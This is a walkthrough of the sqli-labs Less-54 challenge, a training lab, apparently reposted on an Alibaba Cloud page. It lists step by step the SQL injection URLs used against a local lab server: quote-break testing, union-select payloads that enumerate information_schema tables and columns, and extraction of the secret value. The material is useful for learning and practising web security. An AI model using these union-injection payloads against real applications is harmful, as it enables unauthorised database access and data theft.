"Sqli-labs" Less54 get-challenge-union-10 queries Allowed-variation1 (GET Type Challenge Federated query only allows 10 query changes 1)

Source: Internet
Author: User
Tags one table

The number of attempts is only 10 times

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1 '

Single quotation mark error, wrong message not displayed

Add Comment page return to normal, judging by single quote closed

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1 '%23

The page information can be used to determine that the query table has at least id,username,password three fields, so the union select should select3 at least one field

Http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0 ' union select 1,user (), Database ()%23

Concatenate all table names with the Group_concat function

Http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0 ' union SELECT 1,GROUP_CONCAT (TABLE_NAME), 3 from Information_schema.tables where table_schema= ' challenges '%23

There's only one table, check the names.

Http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0 ' union select 1,GROUP_CONCAT (column_name), 3 From Information_schema.columns where table_schema= ' challenges ' and table_name= ' 13klht1vhr '%23

Querying data

Http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0 ' union select 1,secret_r03r,tryy from 13KLHT1VHR Limit 0,1%23

Submit

Success

"Sqli-labs" Less54 get-challenge-union-10 queries Allowed-variation1 (GET Type Challenge union query only allows 10 query changes 1)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.